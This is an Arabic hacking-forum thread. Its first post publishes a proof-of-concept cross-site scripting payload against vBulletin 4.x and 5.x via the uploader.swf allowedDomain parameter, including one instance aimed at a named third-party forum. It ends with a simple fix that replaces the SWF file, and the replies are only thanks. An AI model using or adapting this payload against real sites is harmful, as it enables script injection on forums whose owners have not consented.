1. Secuprog

    Secuprog Developer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [​IMG]

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    ثغرة Xss تعمل على

    vBulletin 4.X and 5.X

    PoC:

    كود PHP:
    Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ​9;}//
    كود PHP:
    Site.com/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%2 ​9;}//
    مثال على الثغره :

    كود PHP:
    www.quadsuk.net/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(document.domain);}//
    [​IMG]

    ترقيع الثغرة

    لجميع نسخ الجيل الرابع :-

    ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم


    كود PHP:
    /clientscript/yui/uploader/assets/uploader.swf


    لجميع نسخ الجيل الخامس :-

    ابحث عن الملف التالي وقم بحذفه ثم قم بإنشاء ملف فارغ بنفس الاسم

    كود PHP:
    /core/clientscript/yui/uploader/assets/uploader.swf
    [​IMG]
     
  2. DEaLeR_HaCKeR

    DEaLeR_HaCKeR Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    73
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الإقامة:
    {مصر أرض الملوك}
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    مشكوور حبيبي بارك الله فيك :{y.}
     
  3. لعنة الهكرز

    لعنة الهكرز Developer

    الأنتساب:
    ‏12 مارس 2013
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    وعليكم السلام ورحمة الله وبركاته
    شكرا على طرح اخى الكريم
     
  4. ŦђĘ βě$Ţ

    ŦђĘ βě$Ţ Developer

    الأنتساب:
    ‏4 مارس 2013
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    يعطيكَ ألف عافية يآلغـآلي !:"
     
  5. ~.O M A R.~

    ~.O M A R.~ Developer

    الأنتساب:
    ‏16 يوليو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأردن
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    بارك الله فيك يا غالى

    مبدع يا غالى :{1}:
     
  6. فہٰايہٰروسہٰ

    فہٰايہٰروسہٰ موقوف لمخالفة الشروط

    الأنتساب:
    ‏25 أكتوبر 2015
    المشاركات:
    71
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    المخالفات
    3
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    مشكور حبيبي{1!9}
     
  7. فہٰايہٰروسہٰ الہٰديہٰوانہ

    فہٰايہٰروسہٰ الہٰديہٰوانہ ExpErt DeveloPer

    الأنتساب:
    ‏27 يونيو 2015
    المشاركات:
    708
    الإعجابات المتلقاة:
    511
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    سايق مخده
    الإقامة:
    ربي يحفظك ياعراق
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    الله يعطيك العافيه:ُ{1e}:ُ​
     
  8. !_عبدالله عباس_!

    !_عبدالله عباس_! DeveloPer Plus

    الأنتساب:
    ‏13 نوفمبر 2015
    المشاركات:
    420
    الإعجابات المتلقاة:
    380
    نقاط الجائزة:
    63
    رد: ثغرة Xss تعمل على vBulletin 4.X and 5.X مع الترقيع

    عاشت الايادي يامبدع​


     

مشاركة هذه الصفحة